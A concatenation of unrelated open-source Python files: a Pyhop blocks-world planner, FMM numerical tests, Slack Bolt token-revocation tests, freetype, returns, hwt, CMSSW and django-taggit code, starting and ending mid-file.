                return [("achieve_goals", goals[1:])]
            elif not get_status_in_arm(state):
                if get_last_clear_status(state, object) == 'clear':
                    return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
                else:
                    return [("move_one", get_max_height_position_block(state , object) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
            else:
                if get_last_position(state, goal["directObject"]) == 'table':
                    return [("achieve_goals", goals[1:])]
                return [("move_one", get_status_in_arm(state) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
            '''
            if get_last_clear_status(state, object) == 'clear':
                return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
            if get_last_clear_status(state, object) == 'not clear':
                if get_last_position(state, object) == "in-arm":
                    return [('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
                else:
                    return [('move_one',get_top_status(state, object)),('move_one',goal["directObject"],'table'), ("achieve_goals", goals[1:])]
            #        else:
            #            return [("unstack_t", "green block", goal["directObject"]), ("pickup", goal["directObject"]), ("achieve_goals", goals[1:])]
            #
            '''
        else:
            print("null")
            return False #fail if goal is not of known type
    return [] #return empty plan if no goals.
"""
Here are some helper functions that are used in the methods' preconditions.
"""
# Global table mapping a block name to its goal position, filled by get_goal_pos.
goal_pos_dic = {}

def get_goal_pos(goal):
    """Parse goal["pos"] (formatted "block:destination") into goal_pos_dic."""
    parts = goal["pos"].split(":")
    goal_pos_dic[parts[0]] = parts[1]
def is_done(b1,state,goal):
    """Return True when b1 (and everything it rests on) is at its goal position.

    Walks down the stack recursively: the table is always 'done'; a block is
    not done if it disagrees with goal_pos_dic, or if it sits on a goal
    destination that is not its own.
    """
    print("The given block is : " )
    print(b1)
    print("----------------------")
    if b1 == 'table': return True
    if b1 in goal_pos_dic:
        print((goal_pos_dic[b1]))
    else:
        print("no!")
    # Block has a goal entry but is not at that position yet.
    if b1 in goal_pos_dic and str(goal_pos_dic[b1]) != str(get_last_position(state, b1)):
        #print("return false")
        return False
    if get_last_position(state, b1)== 'table': return True
    # Block occupies someone else's goal destination.
    if get_last_position(state, b1) in list(goal_pos_dic.values()) and (b1 not in goal_pos_dic or goal_pos_dic[b1] != get_last_position(state, b1)):
        return False
    #raw_input('Enter ...')
    # Recurse onto the block underneath.
    return is_done(get_last_position(state, b1),state,goal)
def status(b1,state,goal):
    """Classify block b1 for the stacking planner.

    Returns one of: 'done' (goal reached), 'move-to-table',
    'move-to-block', or 'waiting'. The decision depends on what is in the
    arm, on b1's clear status, and on whether b1 is the goal's direct or
    indirect object. May return None when no branch matches.
    """
    #print("***********")
    #print(get_last_clear_status(state, b1))
    direct_object = goal["directObject"]
    indirect_object = giveindirectobject(state,direct_object)
    status = get_last_clear_status(state, b1)
    last_position = get_last_position(state, b1)
    indirect_last_position = get_last_position(state, indirect_object)
    top_position = get_top_status(state, b1)
    direct_object_status = get_last_clear_status(state, direct_object)
    indirect_object_status = get_last_clear_status(state, indirect_object)
    status_in_arm = get_status_in_arm(state)
    '''
    print("direct object is ")
    print(direct_object)
    print("indirect object is ")
    print(indirect_object)
    print("status of the block")
    print(status)
    print("status in arm")
    print(status_in_arm)
    print("the block is ")
    print(b1)
    print("last position of block")
    print(last_position)
    print("top position of block")
    print(top_position)
    print("direct object status is ")
    print(direct_object_status)
    print("indirect object status is ")
    print(indirect_object_status)
    print("")
    print("")
    print("")
    print("&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&")
    '''
    #raw_input("enter")
    # Goal configuration already achieved: indirect object sits on direct object.
    if indirect_last_position == direct_object:
        return 'done'
    if status_in_arm:
        if b1 == status_in_arm:
            if b1 == direct_object :
            #    print("In the condition of direct object in arm")
                return 'move-to-table'
            if b1 == indirect_object :
                print("In the condition of indirect object in arm")
                if direct_object_status == 'clear' :
            #        print("direct object status is clear")
                    return 'move-to-block'
                else:
            #        print("direct object status is not clear")
                    return 'move-to-table'
            if ((not(b1 == direct_object)) and (not(b1== indirect_object))) :
            #    print("The object in arm not in goal")
                return 'move-to-table'
    elif status == 'clear':
    #    print("In the condition of status is clear")
        if ((not(b1 == direct_object)) and (not(b1== indirect_object))) :
    #        print("In the condition of block not in goal")
            if last_position == direct_object or last_position == indirect_object:
    #            print("In the condition of last position in direct object or indirect object")
                return 'move-to-table'
        if b1 == indirect_object:
    #        print("In the condition of indirect object")
            if direct_object_status == 'clear':
    #            print("In the condition of direct object status is clear")
                return 'move-to-block'
            elif last_position == direct_object:
    #            print("In the condition of last_position == direct object")
                return 'done'
            elif last_position == 'table':
                return 'waiting'
            else:
    #            print("In the condition of else of last_position == direct object")
                return 'move-to-table'
        if b1 == direct_object:
            print("In the condition of direct object")
            if last_position == indirect_object :
    #            print("In the condition of last_position == direct object")
                return 'move-to-table'
            if (not last_position == 'table') and (not (last_position == indirect_object)) and (not(get_last_clear_status(state, indirect_object) == 'clear')) :
                return 'move-to-table'
            else:
                return 'waiting'
            '''
            if top_position:
                print("top position is not none")
                if not (top_position == indirect_object):
                    print("In the condition of else of last_position == direct object")
                    return 'move-to-table'
            '''
    else :
        return 'waiting'
    '''
    if is_done(b1,state,goal):
        #print("done")
        return 'done'
    elif not (get_last_clear_status(state, b1) or get_last_position(state, b1) == "hand"):
        #print('inaccessible')
        return 'inaccessible'
    elif not (get_last_clear_status(state, b1) or get_last_position(state, b1) == "hand"):
        #print('inaccessible')
        return 'inaccessible'
    elif not (b1 in goal_pos_dic) or str(goal_pos_dic[b1]).strip() == 'table':
        #print("move to table")
        return 'move-to-table'
    elif is_done(goal_pos_dic[b1],state,goal) and get_last_clear_status(state, goal_pos_dic[b1]):
        #print("move to block")
        return 'move-to-block'
    else:
        #print("waiting")
        return 'waiting'
    '''
"""
In each Pyhop planning method, the first argument is the current state (this is analogous to Python methods, in which the first argument is the class instance). The rest of the arguments must match the arguments of the task that the method is for. For example, ('pickup', b1) has a method get_m(state,b1), as shown below.
"""
### methods for "move_blocks"
def moveb_m(state,goal):
    """
    This method implements the following block-stacking algorithm:
    If there's a block that can be moved to its final position, then
    do so and call move_blocks recursively. Otherwise, if there's a
    block that needs to be moved and can be moved to the table, then
    do so and call move_blocks recursively. Otherwise, no blocks need
    to be moved.
    """
    for b1 in all_blocks(state):
       # print("___block: " + b1)
        #raw_input('Enter ...')
        s = status(b1,state,goal)
       # print("")
       # print("")
       # print("result")
       # print(s)
       # raw_input("enter")
        if s == 'move-to-table':
            print("___move one")
            return [('move_one',b1,'table'),('move_blocks',goal)]
        elif s == 'move-to-block':
            # NOTE(review): assumes b1 has an entry in goal_pos_dic here;
            # a missing entry would raise KeyError — confirm status() guarantees it.
            # if not get_status_in_arm(state):
            return [('move_one',b1,goal_pos_dic[b1]), ('move_blocks',goal)]
        else:
            if s == 'done':
                return []
           # print("continue")
            continue
    # No block needed moving: empty plan.
    return []
'''
#
# if we get here, no blocks can be moved to their final locations
b1 = pyhop.find_if(lambda x: status(x,state,goal) == 'waiting', all_blocks(state))
if b1 != None:
return [('move_one',b1,'table'), ('move_blocks',goal)]
#
# if we get here, there are no blocks that need moving
return []
'''
"""
declare_methods must be called once for each taskname. Below, 'declare_methods('get',get_m)' tells Pyhop that 'get' has one method, get_m. Notice that 'get' is a quoted string, and get_m is the actual function.
"""
### methods for "move_one"
def move1(state, b1, dest):
    """Generate subtasks that fetch b1 and place it at dest.

    When either b1 or dest is covered by another block, that blocker is
    first unstacked, put down and released before the get/put pair.
    """
    if get_last_position(state, b1) == "in-arm":
        # Already holding b1: just place it.
        return [('put', b1, dest)]
    if get_last_clear_status(state, b1) == 'not clear':
        blocker = get_top_status(state, b1)
        return [('unstack_task', blocker), ('putdown', blocker),
                ('release', blocker), ('get', b1), ('put', b1, dest)]
    if get_last_clear_status(state, dest) == 'not clear':
        blocker = get_top_status(state, dest)
        return [('unstack_task', blocker), ('putdown', blocker),
                ('release', blocker), ('get', b1), ('put', b1, dest)]
    return [('get', b1), ('put', b1, dest)]
### methods for "get"
def get_by_unstack(state, b1):
    """Acquire b1 by decomposing into a single unstack subtask."""
    return [('unstack_task', b1)]
def get_m(state, b1):
    """Choose how to acquire b1: pick it up from the table or unstack it.

    Returns False when the clear status is unknown (method fails).
    """
    clear = get_last_clear_status(state, b1)
    position = get_last_position(state, b1)
    if clear == 'clear':
        # Clear blocks on the table are picked up directly; otherwise unstack.
        return [('pickup_task', b1)] if position == 'table' else [('unstack_task', b1)]
    if clear == 'not clear':
        return [('pickup_task', b1)]
    return False
def put_m(state, b1, b2):
    """Place the held block b1 at b2 (the table or another block).

    Fails (returns False) unless b1 is currently in the arm.
    """
    if get_last_position(state, b1) != 'in-arm':
        # Can only place a block we are actually holding.
        return False
    if b2 == 'table':
        return [('putdown', b1), ('release', b1), ('raising', b1)]
    return [('stack', b1, b2), ('release', b1), ('raising', b1)]
def put_out_m(state, b1):
    """Extinguish b1 if it is on fire; otherwise nothing to do."""
    return [("putoutfire", b1)] if state.fire[b1] else []
def quick_apprehend_m(state, perp):
    """Apprehend perp immediately if still at large; otherwise no-op."""
    if not state.free[perp]:
        return []
    return [("apprehend", perp)]
def long_apprehend_m(state, perp):
    """Search four times, then apprehend, if perp is still at large."""
    if not state.free[perp]:
        return []
    return [("searchfor", perp)] * 4 + [("apprehend", perp)]
def declare_methods():
    """Register every HTN method with the modified_pyhop planner.

    Must be called once at startup, before planning, so that each task
    name maps to its decomposition method(s).
    """
    modified_pyhop.declare_methods("point_at", point_at_m)
    modified_pyhop.declare_methods("achieve_goals", achieve_goals_m)
    modified_pyhop.declare_methods("put_out", put_out_m)
    modified_pyhop.declare_methods('put',put_m)
    modified_pyhop.declare_methods('unstack_task',unstack_m)
    modified_pyhop.declare_methods('pickup_task',pickup_m)
    modified_pyhop.declare_methods('get',get_m)
    modified_pyhop.declare_methods('move_one',move1)
    modified_pyhop.declare_methods('move_blocks',moveb_m)
|
11520558
|
import time
from math import factorial
import scipy.special
import scipy.spatial
import numpy as np
import tectosaur as tct
from tectosaur.mesh.modify import concat
from tectosaur.fmm.tsfmm import *
import tectosaur.util.gpu as gpu
def fmm_tester(K_name, far_only = False, one_cell = False):
    """Compare a TSFMM evaluation against the direct far-field operator.

    Builds two identical n x n rectangle meshes (the observation mesh is
    shifted along x by ``offset`` when ``far_only`` is set), evaluates
    kernel ``K_name`` both directly and via the FMM, and asserts the two
    results agree to ~5 decimal places.

    :param K_name: kernel name, e.g. 'elasticU3'.
    :param far_only: separate the meshes so every interaction is
        far-field; also asserts the P2P (near-field) list is empty.
    :param one_cell: use a huge max_pts_per_cell so the tree is a single
        cell; combined with far_only, the shift is increased to keep the
        meshes well separated.
    """
    np.random.seed(123987)
    for order in [8]:#range(2, 13):
        float_type = np.float64
        quad_order = 2
        K_params = np.array([1.0, 0.25])
        n = 20
        offset = 0.0
        if far_only:
            offset = 6.0
        if far_only and one_cell:
            offset = 9.0
        corners = [[-1.0, -1.0, 0], [-1.0, 1.0, 0], [1.0, 1.0, 0], [1.0, -1.0, 0]]
        m_src = tct.make_rect(n, n, corners)
        # 9 dofs per triangle: 3 vertices x 3 vector components.
        v = np.random.rand(m_src[1].shape[0] * 9).astype(float_type)
        m_obs = tct.make_rect(n, n, corners)
        m_obs[0][:,0] += offset
        full_m = concat(m_src, m_obs)
        src_subset = np.arange(0, m_src[1].shape[0])
        obs_subset = np.arange(0, m_obs[1].shape[0]) + m_src[1].shape[0]
        # Reference: dense direct evaluation of the same operator.
        op = tct.TriToTriDirectFarfieldOp(
            quad_order, K_name, K_params, full_m[0], full_m[1],
            float_type, obs_subset, src_subset
        )
        y1 = op.dot(v)
        max_pts_per_cell = 2
        if one_cell:
            max_pts_per_cell = int(1e9)
        fmm = TSFMM(
            m_obs, m_src, params = K_params, order = order,
            quad_order = quad_order, float_type = float_type,
            K_name = K_name,
            mac = 2.5, max_pts_per_cell = max_pts_per_cell,
            n_workers_per_block = 128
        )
        if far_only:
            # With the meshes separated, no pairs should fall back to P2P.
            assert(fmm.interactions.p2p.src_n_idxs.shape[0] == 0)
        report_interactions(fmm)
        y2 = fmm.dot(v)
        print(order, np.linalg.norm((y1 - y2)) / np.linalg.norm(y1))
        print(y1, y2)
        np.testing.assert_almost_equal(y1, y2, 5)
def test_fmmU():
    # Accuracy test for the 'elasticU3' kernel.
    fmm_tester('elasticU3')
def test_fmmT():
    # Accuracy test for the 'elasticRT3' kernel.
    fmm_tester('elasticRT3')
def test_fmmA():
    # Accuracy test for the 'elasticRA3' kernel.
    fmm_tester('elasticRA3')
def test_fmmH():
    # Accuracy test for the 'elasticRH3' kernel.
    fmm_tester('elasticRH3')
def benchmark():
    """Benchmark TSFMM.dot on a large mesh and regression-check the result.

    Set ``compare = True`` to also time the dense direct operator and the
    legacy FMM implementation for comparison.
    """
    compare = False
    np.random.seed(123456)
    float_type = np.float32
    n = 1000
    K_name = 'elasticRH3'
    corners = [[-1.0, -1.0, 0], [-1.0, 1.0, 0], [1.0, 1.0, 0], [1.0, -1.0, 0]]
    m = tct.make_rect(n, n, corners)
    v = (100000 * np.random.rand(m[1].shape[0] * 9)).astype(float_type)
    t = tct.Timer()
    if compare:
        all_tris = np.arange(m[1].shape[0])
        op = tct.TriToTriDirectFarfieldOp(
            2, K_name, [1.0, 0.25], m[0], m[1],
            float_type, all_tris, all_tris
        )
        t.report('build direct')
        for i in range(2):
            y1 = op.dot(v)
            t.report('op.dot direct')
        all_tris = np.arange(m[1].shape[0])
        oldfmm = tct.FMMFarfieldOp(4.0, 400, 1e-5)(
            2, K_name, [1.0, 0.25], m[0], m[1],
            float_type, all_tris, all_tris
        )
        t.report('build oldfmm')
        for i in range(2):
            oldfmm.dot(v)
            t.report('op.dot oldfmm')
    # TODO: still maybe some room in p2p compared to direct
    # TODO: maybe do full fmm?
    fmm = TSFMM(
        m, m, params = np.array([1.0, 0.25]), order = 4,
        K_name = K_name, quad_order = 2, float_type = float_type,
        mac = 2.5, max_pts_per_cell = 80, n_workers_per_block = 128
    )
    report_interactions(fmm)
    t.report('build')
    # The first dot calls include warm-up cost; only the third is timed.
    out = fmm.dot(v)
    t.report('first dot')
    out = fmm.dot(v)
    t.report('second dot')
    for i in range(1):
        start = time.time()
        out = fmm.dot(v)
        t.report('third dot')
    took = time.time() - start
    interactions = m[1].shape[0] ** 2
    print('million rows/sec', m[1].shape[0] / took / 1e6)
    print('billion interactions/sec', interactions / took / 1e9)
    # Regression check against a previously saved known-good result.
    filename = 'tests/fmm/taylorbenchmarkcorrect.npy'
    # np.save(filename, out)
    correct = np.load(filename)
    # print(out, correct, y1)
    np.testing.assert_almost_equal(out, correct, 5)
if __name__ == "__main__":
    # Run the (slow) benchmark only when executed directly, not under pytest.
    benchmark()
|
11520601
|
import ee
from ee_plugin import Map
# Display one NAIP DOQQ quarter-quad image using its N, R and G bands,
# centered on the quad at zoom level 17.
image = ee.Image('USDA/NAIP/DOQQ/m_3712213_sw_10_1_20140613')
Map.setCenter(-122.466123, 37.769833, 17)
Map.addLayer(image, {'bands': ['N', 'R','G']}, 'NAIP')
|
11520610
|
import asyncio
import json
from time import time
from typing import Optional
import pytest
from slack_sdk.oauth.installation_store.async_installation_store import (
AsyncInstallationStore,
)
from slack_sdk.signature import SignatureVerifier
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.app.async_app import AsyncApp
from slack_bolt.error import BoltError
from slack_bolt.request.async_request import AsyncBoltRequest
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
assert_auth_test_count_async,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
# Token returned by the mock auth.test endpoint in these tests.
valid_token = "<KEY>"
class MyInstallationStore(AsyncInstallationStore):
    """Installation-store stub that records which delete hooks were invoked."""

    def __init__(self):
        # Flags flipped by the delete callbacks; inspected by the tests below.
        self.delete_bot_called = False
        self.delete_installation_called = False
        self.delete_all_called = False
    async def async_delete_bot(
        self, *, enterprise_id: Optional[str], team_id: Optional[str]
    ) -> None:
        self.delete_bot_called = True
    async def async_delete_installation(
        self,
        *,
        enterprise_id: Optional[str],
        team_id: Optional[str],
        user_id: Optional[str] = None
    ) -> None:
        self.delete_installation_called = True
    async def async_delete_all(
        self, *, enterprise_id: Optional[str], team_id: Optional[str]
    ):
        self.delete_all_called = True
        # Delegate to the base class; the tests expect it to fan out to the
        # bot/installation delete hooks as well (see test_app_uninstalled).
        return await super().async_delete_all(
            enterprise_id=enterprise_id, team_id=team_id
        )
class TestEventsTokenRevocations:
    """Tests for Bolt's built-in tokens_revoked / app_uninstalled listeners."""

    signing_secret = "secret"
    valid_token = "<KEY>"
    mock_api_server_base_url = "http://localhost:8888"
    signature_verifier = SignatureVerifier(signing_secret)
    web_client = AsyncWebClient(token=None, base_url=mock_api_server_base_url)
    @pytest.fixture
    def event_loop(self):
        # Replaces the default loop fixture: strips Slack env vars for the
        # duration of the test and runs the mock Slack API server.
        old_os_env = remove_os_env_temporarily()
        try:
            setup_mock_web_api_server(self)
            loop = asyncio.get_event_loop()
            yield loop
            loop.close()
            cleanup_mock_web_api_server(self)
        finally:
            restore_os_env(old_os_env)
    def generate_signature(self, body: str, timestamp: str):
        # Produce a valid x-slack-signature value for the given body.
        return self.signature_verifier.generate_signature(
            body=body,
            timestamp=timestamp,
        )
    def build_headers(self, timestamp: str, body: str):
        # Headers that make the request pass Bolt's signature verification.
        return {
            "content-type": ["application/json"],
            "x-slack-signature": [self.generate_signature(body, timestamp)],
            "x-slack-request-timestamp": [timestamp],
        }
    @pytest.mark.asyncio
    async def test_no_installation_store(self):
        # Without an installation store, enabling the revocation listeners
        # must raise BoltError instead of failing silently later.
        self.web_client.token = valid_token
        app = AsyncApp(
            client=self.web_client,
            signing_secret=self.signing_secret,
        )
        with pytest.raises(BoltError):
            app.default_tokens_revoked_event_listener()
        with pytest.raises(BoltError):
            app.default_app_uninstalled_event_listener()
        with pytest.raises(BoltError):
            app.enable_token_revocation_listeners()
    @pytest.mark.asyncio
    async def test_tokens_revoked(self):
        app = AsyncApp(
            client=self.web_client,
            signing_secret=self.signing_secret,
            installation_store=MyInstallationStore(),
        )
        event_payload = {
            "token": "verification-token",
            "enterprise_id": "E111",
            "api_app_id": "A111",
            "event": {
                "type": "tokens_revoked",
                "tokens": {"oauth": ["W111"], "bot": ["W222"]},
            },
            "type": "event_callback",
            "event_id": "Ev111",
            "event_time": 1606805974,
        }
        timestamp, body = str(int(time())), json.dumps(event_payload)
        request: AsyncBoltRequest = AsyncBoltRequest(
            body=body, headers=self.build_headers(timestamp, body)
        )
        # Before the listeners are enabled, the event is unhandled (404).
        response = await app.async_dispatch(request)
        assert response.status == 404
        # Enable the built-in event listeners
        app.enable_token_revocation_listeners()
        response = await app.async_dispatch(request)
        assert response.status == 200
        # auth.test API call must be skipped
        await assert_auth_test_count_async(self, 0)
        await asyncio.sleep(1)  # wait a bit after auto ack()
        assert app.installation_store.delete_bot_called is True
        assert app.installation_store.delete_installation_called is True
        assert app.installation_store.delete_all_called is False
    @pytest.mark.asyncio
    async def test_app_uninstalled(self):
        app = AsyncApp(
            client=self.web_client,
            signing_secret=self.signing_secret,
            installation_store=MyInstallationStore(),
        )
        event_payload = {
            "token": "<PASSWORD>",
            "enterprise_id": "E111",
            "api_app_id": "A111",
            "event": {"type": "app_uninstalled"},
            "type": "event_callback",
            "event_id": "Ev111",
            "event_time": 1606805974,
        }
        timestamp, body = str(int(time())), json.dumps(event_payload)
        request: AsyncBoltRequest = AsyncBoltRequest(
            body=body, headers=self.build_headers(timestamp, body)
        )
        # Before the listeners are enabled, the event is unhandled (404).
        response = await app.async_dispatch(request)
        assert response.status == 404
        # Enable the built-in event listeners
        app.enable_token_revocation_listeners()
        response = await app.async_dispatch(request)
        assert response.status == 200
        # auth.test API call must be skipped
        await assert_auth_test_count_async(self, 0)
        await asyncio.sleep(1)  # wait a bit after auto ack()
        # app_uninstalled wipes everything, including delete_all.
        assert app.installation_store.delete_bot_called is True
        assert app.installation_store.delete_installation_called is True
        assert app.installation_store.delete_all_called is True
|
11520625
|
import streamlit as st
import pandas as pd
# Minimal st.write demo: a plain number, then a 4x2 DataFrame as a table.
st.write(1234)
st.write(
    pd.DataFrame({"first column": [1, 2, 3, 4], "second column": [10, 20, 30, 40]})
)
|
11520651
|
import glob
import os
import freetype
import pytest
# Directory containing this test file; used to locate the example assets.
test_folder = os.path.realpath(os.path.dirname(__file__))
def test_load_ft_face():
    """A smoke test."""
    p = os.path.join(test_folder, "..", "examples", "Vera.ttf")
    assert freetype.Face(p)
def test_load_ft_face_from_memory():
    """Another smoke test."""
    p = os.path.join(test_folder, "..", "examples", "Vera.ttf")
    # Load from an open binary file object...
    with open(p, mode="rb") as f:
        assert freetype.Face(f)
    # ...and from raw bytes.
    with open(p, mode="rb") as f:
        byte_stream = f.read()
    assert freetype.Face.from_bytes(byte_stream)
def test_bundle_version():
    """Check a bundled FreeType matches the version pinned in setup-build-freetype.py."""
    module_dir = os.path.dirname(freetype.__file__)
    shared_object = glob.glob(os.path.join(module_dir, "libfreetype*"))
    if shared_object:
        import re
        p = os.path.join(test_folder, "..", "setup-build-freetype.py")
        with open(p) as f:
            m = re.findall(r"freetype-(\d+)\.(\d+)\.?(\d+)?\.tar", f.read())
        version = m[0]
        # The patch component may be absent from the tarball name.
        if not version[2]:
            version = (int(version[0]), int(version[1]), 0)
        else:
            version = (int(version[0]), int(version[1]), int(version[2]))
        assert freetype.version() == version
    else:
        pytest.skip("Not using a bundled FreeType library.")
|
11520678
|
from copy import copy
from hwt.doc_markers import internal
from hwt.hdl.types.bits import Bits
from hwt.hdl.types.defs import INT
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.mainBases import RtlSignalBase
def slice_member_to_hval(v):
    """Normalize one member of a python slice (start/stop/step) to a HDL value.

    Signals are passed through (their dtype must be Bits); HValue instances
    are cast to INT unless the Bits check below matches; any other python
    object (int, None, ...) is converted via INT.from_py.
    """
    if isinstance(v, RtlSignalBase): # is signal
        assert isinstance(v._dtype, Bits)
        return v
    elif isinstance(v, HValue):
        if isinstance(v, Bits):
            # NOTE(review): `v` is a value while `Bits` is a type class, so
            # this branch looks unreachable; should it test `v._dtype` like
            # the signal branch above? Confirm against hwt's value classes.
            return v
        else:
            return v._auto_cast(INT)
    else:
        return INT.from_py(v)
class HSliceVal(HValue):
    """
    HValue class for HSlice type

    ``self.val`` is a python :class:`slice` whose start/stop/step members
    are HDL values (see :func:`slice_member_to_hval`).
    """
    @classmethod
    def from_py(cls, typeObj, val, vld_mask=None):
        """Build a HSliceVal from a python slice (None means all-unknown)."""
        assert vld_mask is None, vld_mask
        if val is None:
            val = slice(None, None, None)
        else:
            assert isinstance(val, slice), val
            start = slice_member_to_hval(val.start)
            stop = slice_member_to_hval(val.stop)
            step = slice_member_to_hval(val.step)
            val = slice(start, stop, step)
        return cls(typeObj, val, vld_mask=1)

    def _is_full_valid(self):
        # Only start/stop are checked; step is not consulted here.
        v = self.val
        return v.start._is_full_valid() and v.stop._is_full_valid()

    def to_py(self):
        """
        Convert to python slice object
        """
        v = self.val
        return slice(int(v.start), int(v.stop), int(v.step))

    def _size(self):
        """
        :return: how many bits is this slice selecting
        """
        assert isinstance(self, HValue)
        v = self.val
        if v.step == -1:
            return int(v.start) - int(v.stop)
        elif v.step == 1:
            return int(v.stop) - int(v.start)
        else:
            raise NotImplementedError(self)

    def _eq_val(self, other):
        # Value-domain equality: both operands must be HSliceVal.
        assert isinstance(other, HSliceVal)
        return self.val == other.val

    def _eq(self, other):
        # Bug fix: this used to call ``self._eq__val`` (double underscore),
        # a name not defined in this class; the helper defined above is
        # ``_eq_val``, so the call always raised AttributeError.
        return self._eq_val(other)

    def __lt__(self, other):
        if self.val.step != other.val.step:
            raise ValueError()
        if isinstance(other, INT.getValueCls()):
            return self.val.start < other
        else:
            return (self.val.start, self.val.stop) < (other.val.start, other.val.stop)

    def __copy__(self):
        # Copy the wrapper and also the contained slice so the copies
        # do not share mutable state.
        v = HValue.__copy__(self)
        v.val = copy(v.val)
        return v

    def staticEval(self):
        v = self.val
        new_v = slice(
            v.start.staticEval(),
            v.stop.staticEval(),
            v.step.staticEval(),
        )
        return self.__class__.from_py(self._dtype, new_v)

    @internal
    def __hash__(self):
        v = self.val
        return hash((self._dtype, v.start, v.stop, v.step))
|
11520701
|
import pytest
from returns.context import (
RequiresContext,
RequiresContextFutureResult,
RequiresContextIOResult,
RequiresContextResult,
)
from returns.converters import flatten
from returns.future import Future, FutureResult
from returns.io import IO, IOFailure, IOSuccess
from returns.maybe import Nothing, Some
from returns.result import Failure, Success
# A container nested inside a container of the same type is collapsed one
# level by `flatten`; failure-side nestings are expected to stay unchanged.
@pytest.mark.parametrize(('container', 'merged'), [
    # Flattens:
    (IO(IO(1)), IO(1)),
    (Success(Success({})), Success({})),
    (IOSuccess(IOSuccess(1)), IOSuccess(1)),
    (Some(Some(None)), Some(None)),
    (Some(Some([])), Some([])),
    # Nope:
    (Nothing, Nothing),
    (Failure(Failure('a')), Failure(Failure('a'))),
    (Failure(Success('a')), Failure(Success('a'))),
    (IOFailure(IOFailure('a')), IOFailure(IOFailure('a'))),
    (IOFailure(IOSuccess('a')), IOFailure(IOSuccess('a'))),
])
def test_flatten(container, merged):
    """Ensures that `flatten` is always returning the correct type."""
    assert flatten(container) == merged
@pytest.mark.parametrize(('container', 'merged'), [
    (
        RequiresContextResult.from_value(
            RequiresContextResult.from_value(1),
        ),
        RequiresContextResult.from_value(1),
    ),
    (
        RequiresContextIOResult.from_value(
            RequiresContextIOResult.from_value(1),
        ),
        RequiresContextIOResult.from_value(1),
    ),
    (
        RequiresContext.from_value(RequiresContext.from_value(1)),
        RequiresContext.from_value(1),
    ),
])
def test_flatten_context(container, merged):
    """Ensures that `flatten` is always returning the correct type."""
    # Context containers are functions of a dependency; call both with a
    # dummy dependency (`...`) to compare the produced values.
    assert flatten(container)(...) == merged(...)
@pytest.mark.anyio()
async def test_flatten_future(subtests):
    """Ensures that `flatten` is always returning the correct type."""
    futures = [
        # Flattens:
        (Future.from_value(Future.from_value(1)), Future.from_value(1)),
        (
            FutureResult.from_value(FutureResult.from_value(1)),
            FutureResult.from_value(1),
        ),
    ]
    for container, merged in futures:
        with subtests.test(container=container, merged=merged):
            assert await flatten(container) == await merged  # type: ignore
@pytest.mark.anyio()
async def test_flatten_context_future_result(subtests):
    """Ensures that `flatten` is always returning the correct type."""
    futures = [
        # Flattens:
        (
            RequiresContextFutureResult.from_value(
                RequiresContextFutureResult.from_value(1),
            ),
            RequiresContextFutureResult.from_value(1),
        ),
    ]
    for container, merged in futures:
        with subtests.test(container=container, merged=merged):
            assert await flatten(
                container,
            )(...) == await merged(...)
@pytest.mark.anyio()
async def test_non_flatten_future(subtests):
    """Ensures that `flatten` is always returning the correct type."""
    futures = [
        # Not flattens:
        FutureResult.from_failure(FutureResult.from_failure(1)),
        FutureResult.from_failure(FutureResult.from_value(1)),
    ]
    for cont in futures:
        with subtests.test(container=cont):
            # The failure payload must still be the inner container.
            assert isinstance(
                (await flatten(cont)).failure()._inner_value,  # noqa: WPS437
                cont.__class__,
            )
@pytest.mark.anyio()
async def test_non_flatten_context_future_result(subtests):
    """Ensures that `flatten` is always returning the correct type."""
    futures = [
        # Not flattens:
        RequiresContextFutureResult.from_failure(
            RequiresContextFutureResult.from_failure(1),
        ),
        RequiresContextFutureResult.from_failure(
            RequiresContextFutureResult.from_value(1),
        ),
    ]
    for cont in futures:
        with subtests.test(container=cont):
            inner = await flatten(cont)(...)
            # The failure payload must still be the inner container.
            assert isinstance(
                inner.failure()._inner_value,  # noqa: WPS437
                cont.__class__,
            )
|
11520711
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
# DQM analyzer configuration: monitors RPC rec-hit probability for muons
# passing the pt/eta cuts below; output folders are configured under 'RPC'.
rpcrechitprobability = DQMEDAnalyzer('RPCRecHitProbability',
    SaveRootFile = cms.untracked.bool(False),
    RootFileName = cms.untracked.string('RPCRecHitProbabilityDQM.root'),
    MuonPtCut = cms.untracked.double(3.0),
    MuonEtaCut= cms.untracked.double(1.9),
    ScalersRawToDigiLabel = cms.InputTag('scalersRawToDigi'),
    MuonLabel = cms.InputTag('muons'),
    RPCFolder = cms.untracked.string('RPC'),
    GlobalFolder = cms.untracked.string('SummaryHistograms/RecHits'),
    MuonFolder = cms.untracked.string("Muon")
)
|
11520729
|
from django import forms
from django.utils.translation import gettext as _
from taggit.utils import edit_string_for_tags, parse_tags
class TagWidget(forms.TextInput):
    """Text input that renders a collection of tags as an edit string."""

    def format_value(self, value):
        # None and already-formatted strings pass through untouched; any
        # other value is assumed to be an iterable of tags and serialized.
        needs_serializing = value is not None and not isinstance(value, str)
        if needs_serializing:
            value = edit_string_for_tags(value)
        return super().format_value(value)
class TagField(forms.CharField):
    """CharField that parses a comma-separated string into a list of tag names."""

    widget = TagWidget

    def clean(self, value):
        """Return the list of tag names parsed from ``value``.

        Raises:
            forms.ValidationError: if the string cannot be parsed as tags.
        """
        value = super().clean(value)
        try:
            return parse_tags(value)
        except ValueError as e:
            # Fix: chain the original parse error (`from e`) so the real
            # cause is preserved in tracebacks instead of being discarded.
            raise forms.ValidationError(
                _("Please provide a comma-separated list of tags.")
            ) from e

    def has_changed(self, initial_value, data_value):
        # Always return False if the field is disabled since self.bound_data
        # always uses the initial value in this case.
        if self.disabled:
            return False
        try:
            data_value = self.clean(data_value)
        except forms.ValidationError:
            # Unparseable input: compare the raw value below.
            pass
        if initial_value is None:
            initial_value = []
        # Compare tag *names*, sorted to match the parsed representation.
